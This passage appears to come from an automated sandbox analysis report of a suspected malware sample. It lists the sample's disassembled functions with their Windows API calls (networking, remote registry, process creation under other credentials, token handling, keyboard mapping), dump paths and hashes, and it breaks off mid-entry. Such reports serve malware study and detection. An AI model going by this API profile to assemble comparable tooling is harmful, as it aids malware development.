Instruction Fuzzy Hash: CBF01D31442506EBD7425B94EF8DBE67B35FF01702F446016F101908A0C778A465DF94

Function 007E1C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 007E1DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 007E1DE1
WSAGetLastError.WSOCK32 ref: 007E1DF2
htons.WSOCK32(?,?,?,?,?), ref: 007E1EDB
inet_ntoa.WSOCK32(?), ref: 007E1E8C

Part of subcall function 007C39E8: _strlen.LIBCMT ref: 007C39F2

Part of subcall function 007E3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,007DEC0C), ref: 007E3240

_strlen.LIBCMT ref: 007E1F35

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 9675efa84a93d12f4858342654f3124ad9fd874ae0f8405ef71d57662e07c61c
Instruction ID: 9ccf83041e6bd83cc29191e87c6004e859a6dd0e6d3a559c617aa29d3a9417f7
Opcode Fuzzy Hash: 9675efa84a93d12f4858342654f3124ad9fd874ae0f8405ef71d57662e07c61c
Instruction Fuzzy Hash: 3CB1F530205380EFC724DF25C89AE2A77E5AF89318F94854CF4569B2E2DB39ED41CB91

Function 007901B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 007900BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007900D6
__allrem.LIBCMT ref: 007900ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0079010B
__allrem.LIBCMT ref: 00790122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00790140

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: aa5c8a94b4d0489d0fe1dc96e191247efa934f354d7d1c78df726465055833b5
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: BF811976640B06EFEB20AF69EC49B6F73E8AF41724F24413AF511D7681E778D9008790

Function 007961FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007882D9,007882D9,?,?,?,0079644F,00000001,00000001,8BE85006), ref: 00796258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0079644F,00000001,00000001,8BE85006,?,?,?), ref: 007962DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007963D8
__freea.LIBCMT ref: 007963E5

Part of subcall function 00793820: RtlAllocateHeap.NTDLL(00000000,?,00831444,?,0077FDF5,?,?,0076A976,00000010,00831440,007613FC,?,007613C6,?,00761129), ref: 00793852

__freea.LIBCMT ref: 007963EE
__freea.LIBCMT ref: 00796413

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: cec8ba7422b2327f5984a2b75a8968458b31cf8e17d693f0b3f0e9f2217af258
Instruction ID: a64d71ae662ec32ff4906f71ea476b11107609bfb148b8cff04e69934e720a70
Opcode Fuzzy Hash: cec8ba7422b2327f5984a2b75a8968458b31cf8e17d693f0b3f0e9f2217af258
Instruction Fuzzy Hash: F151D072A00216ABEF268F64ED85EBF77AAEB44750F154729FC05D6190EB3CDC50C6A0

Function 007EBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00769CB3: _wcslen.LIBCMT ref: 00769CBD

Part of subcall function 007EC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007EB6AE,?,?), ref: 007EC9B5
Part of subcall function 007EC998: _wcslen.LIBCMT ref: 007EC9F1
Part of subcall function 007EC998: _wcslen.LIBCMT ref: 007ECA68
Part of subcall function 007EC998: _wcslen.LIBCMT ref: 007ECA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007EBCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007EBD25
RegCloseKey.ADVAPI32(00000000), ref: 007EBD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007EBD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 007EBDF3
RegCloseKey.ADVAPI32(?), ref: 007EBDFF

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: e354008a74ae0481db0d652730ec837913107779923cb4227d5a5d331ebab7ed
Instruction ID: e2435d1221747e27abad3818c6f6d59b2f8bc51ec9c931525be6f104e912bc3f
Opcode Fuzzy Hash: e354008a74ae0481db0d652730ec837913107779923cb4227d5a5d331ebab7ed
Instruction Fuzzy Hash: 03816E30209241EFD714DF25C895E2ABBE5FF88308F14855CF55A8B2A2DB35ED45CB92

Function 007BF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 007BF7B9
SysAllocString.OLEAUT32(00000001), ref: 007BF860
VariantCopy.OLEAUT32(007BFA64,00000000), ref: 007BF889
VariantClear.OLEAUT32(007BFA64), ref: 007BF8AD
VariantCopy.OLEAUT32(007BFA64,00000000), ref: 007BF8B1
VariantClear.OLEAUT32(?), ref: 007BF8BB

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: bc74f7ae326d596e145141f4b4018438f8bf7c5220131bf647ce3fa878b64d2e
Instruction ID: 71fcf20c8f6bea1a6e4cca47b192bc2976718273ad4436b5f102463fc57b84da
Opcode Fuzzy Hash: bc74f7ae326d596e145141f4b4018438f8bf7c5220131bf647ce3fa878b64d2e
Instruction Fuzzy Hash: 8751E631601310FACF24AB65DC99BB9B3A8EF45B10B209477E906DF291DB789C40C796

Function 007D910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00767620: _wcslen.LIBCMT ref: 00767625

Part of subcall function 00766B57: _wcslen.LIBCMT ref: 00766B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 007D94E5
_wcslen.LIBCMT ref: 007D9506
_wcslen.LIBCMT ref: 007D952D
GetSaveFileNameW.COMDLG32(00000058), ref: 007D9585

Strings

X, xrefs: 007D9412

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 7ee3c006482a0e89fa7eca8f59b3502ad31cb509fdf5072a13fb80f7a40eadab
Instruction ID: 3ac951ac49c2b037c074548401518ba3c0814b97eb59ab49474d661eca98f780
Opcode Fuzzy Hash: 7ee3c006482a0e89fa7eca8f59b3502ad31cb509fdf5072a13fb80f7a40eadab
Instruction Fuzzy Hash: 0EE18131604340DFD724DF24C885A6AB7F4BF85314F14896DE98A9B3A2DB39ED05CB91

Function 0077920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00779BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00779BB2

BeginPaint.USER32(?,?,?), ref: 00779241
GetWindowRect.USER32(?,?), ref: 007792A5
ScreenToClient.USER32(?,?), ref: 007792C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007792D3
EndPaint.USER32(?,?,?,?,?), ref: 00779321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 007B71EA

Part of subcall function 00779339: BeginPath.GDI32(00000000), ref: 00779357

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 50f83f5b171426c50b2cb0d9f8669c25cc56c9adb39a566c1626e89dd224601a
Instruction ID: b25110fc1aeb8b6f90fba8b50fc65cd9c493f347f8ae110ac5e0f4268fe35834
Opcode Fuzzy Hash: 50f83f5b171426c50b2cb0d9f8669c25cc56c9adb39a566c1626e89dd224601a
Instruction Fuzzy Hash: 5641A170105204EFDB11DF24CC88FBA7BA8FB85760F144669FA59872A1C7399845DB61

Function 007D07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 007D080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 007D0847
EnterCriticalSection.KERNEL32(?), ref: 007D0863
LeaveCriticalSection.KERNEL32(?), ref: 007D08DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 007D08F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 007D0921

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 2ef7603ff117d77d743d7d76f58dfcc90f53a9b3b3797cf93b4ea1f1b41a7ac7
Instruction ID: 806f4cbcc92111b578bd397df78515ada89947d7d68b95bf3c2c6bf4b43489ea
Opcode Fuzzy Hash: 2ef7603ff117d77d743d7d76f58dfcc90f53a9b3b3797cf93b4ea1f1b41a7ac7
Instruction Fuzzy Hash: 7241BD71900209EFDF15EF64DC85A6A7778FF04300F1080A9ED04AA297D738EE61DBA4

Function 007D581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00763AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00763A97,?,?,00762E7F,?,?,?,00000000), ref: 00763AC2

_wcslen.LIBCMT ref: 007D587B
CoInitialize.OLE32(00000000), ref: 007D5995
CoCreateInstance.OLE32(007FFCF8,00000000,00000001,007FFB68,?), ref: 007D59AE
CoUninitialize.OLE32 ref: 007D59CC

Strings

.lnk, xrefs: 007D5876, 007D58C1, 007D5985

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 88f853b8d804654cd4235e2d174bed38259ca6af81629a21bc95d949ed554e5f
Instruction ID: 635d3c6c9f0b2bfa29ab48776c7a683fca9416923f7c4556f19184d58ffe8725
Opcode Fuzzy Hash: 88f853b8d804654cd4235e2d174bed38259ca6af81629a21bc95d949ed554e5f
Instruction Fuzzy Hash: 9DD153B1604601DFC714DF24C49492ABBF5EF89724F14885EF88A9B361DB39EC45CB92

Function 007C175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007C0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007C0FCA
Part of subcall function 007C0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007C0FD6
Part of subcall function 007C0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007C0FE5
Part of subcall function 007C0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007C0FEC
Part of subcall function 007C0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007C1002

GetLengthSid.ADVAPI32(?,00000000,007C1335), ref: 007C17AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 007C17BA
HeapAlloc.KERNEL32(00000000), ref: 007C17C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 007C17DA
GetProcessHeap.KERNEL32(00000000,00000000,007C1335), ref: 007C17EE
HeapFree.KERNEL32(00000000), ref: 007C17F5

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 6fc6eecb2b011273b0ecca46ae829338f700e9875ca7b9a067e7f24b781d6f8b
Instruction ID: c3742bc3024b13357ef82147b965a2d181941df57b4b9e04c093d13fe1ca9506
Opcode Fuzzy Hash: 6fc6eecb2b011273b0ecca46ae829338f700e9875ca7b9a067e7f24b781d6f8b
Instruction Fuzzy Hash: 73119772610209EFDB119FA4CD49FBE7BA9EF42355F50802CF881A7212D73AAD55CB60

Function 007C14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007C14FF
OpenProcessToken.ADVAPI32(00000000), ref: 007C1506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007C1515
CloseHandle.KERNEL32(00000004), ref: 007C1520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007C154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 007C1563

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: a29b6365fff2119f1653166e981f9a8e576d475c28c178d3f7f83202b6a35c8c
Instruction ID: 47c5dcb84ecb11da001f2394a9ff483d73ec2898e614244f4df2225036d09f46
Opcode Fuzzy Hash: a29b6365fff2119f1653166e981f9a8e576d475c28c178d3f7f83202b6a35c8c
Instruction Fuzzy Hash: E511607250024DEBDF128F94DE49FDE7BA9EF45744F048068FA05A2160C379CE65EB60

Function 00783382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00783379,00782FE5), ref: 00783390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0078339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007833B7
SetLastError.KERNEL32(00000000,?,00783379,00782FE5), ref: 00783409

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 2348ae39b73648fde94864bd4b1feb0f74df7ee6df3f0d140f71fc3807deec6c
Instruction ID: b00d30194383aadcb1fd40753bcf30ef36d63b8f11f4b12986d9397a1a8c92b7
Opcode Fuzzy Hash: 2348ae39b73648fde94864bd4b1feb0f74df7ee6df3f0d140f71fc3807deec6c
Instruction Fuzzy Hash: C301D432789711FEAA25377CBC89A7A2A94FB05B79720422AF414851F1EF1D4E029785

Function 00792D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00795686,007A3CD6,?,00000000,?,00795B6A,?,?,?,?,?,0078E6D1,?,00828A48), ref: 00792D78
_free.LIBCMT ref: 00792DAB
_free.LIBCMT ref: 00792DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0078E6D1,?,00828A48,00000010,00764F4A,?,?,00000000,007A3CD6), ref: 00792DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0078E6D1,?,00828A48,00000010,00764F4A,?,?,00000000,007A3CD6), ref: 00792DEC
_abort.LIBCMT ref: 00792DF2

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 42b44fdc1d93a48d5ee66be61004a12c805eaa4e3d180917b67ab9f5cf655b34
Instruction ID: 2424ae9b8ea5e1d77117384e08fe183d96961dfe2c19539ba4f5e95e843ef0e8
Opcode Fuzzy Hash: 42b44fdc1d93a48d5ee66be61004a12c805eaa4e3d180917b67ab9f5cf655b34
Instruction Fuzzy Hash: C5F04435645A00B7CE227734BC0EE6E2659BFC27A1F254519F824E62A3EE6C980355A1

Function 007F8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00779639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00779693
Part of subcall function 00779639: SelectObject.GDI32(?,00000000), ref: 007796A2
Part of subcall function 00779639: BeginPath.GDI32(?), ref: 007796B9
Part of subcall function 00779639: SelectObject.GDI32(?,00000000), ref: 007796E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 007F8A4E
LineTo.GDI32(?,00000003,00000000), ref: 007F8A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 007F8A70
LineTo.GDI32(?,00000000,00000003), ref: 007F8A80
EndPath.GDI32(?), ref: 007F8A90
StrokePath.GDI32(?), ref: 007F8AA0

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: b5521ac7876ad03ec3b7b6f5fec0d5c12aca65aca1ce68ace130cf0da479a2f2
Instruction ID: 15fcc156f3119cd796d9fe13be218521f86513cf725a3e88a8c6c1f6ba9042b7
Opcode Fuzzy Hash: b5521ac7876ad03ec3b7b6f5fec0d5c12aca65aca1ce68ace130cf0da479a2f2
Instruction Fuzzy Hash: 6711097600010DFFDF129F90DC88EAA7F6CEB08354F00C012FA199A1A1DB759D55DBA0

Function 007C51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 007C5218
GetDeviceCaps.GDI32(00000000,00000058), ref: 007C5229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007C5230
ReleaseDC.USER32(00000000,00000000), ref: 007C5238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 007C524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 007C5261

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 5bd9a6aaacac9c4dfff9f7b5764311363d0625e3a040c271acde2a3999f26c2a
Instruction ID: 4cbab3ea8dc0d391f3f06b0c9775c70bc912ebe31dfb53271acdd26a0c2c1671
Opcode Fuzzy Hash: 5bd9a6aaacac9c4dfff9f7b5764311363d0625e3a040c271acde2a3999f26c2a
Instruction Fuzzy Hash: CA018FB5A00708BBEB119BA59D49F5EBFB8FB48751F048069FA04E7380DA749800CBA4

Function 00761BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00761BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00761BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00761C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00761C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00761C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00761C22

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

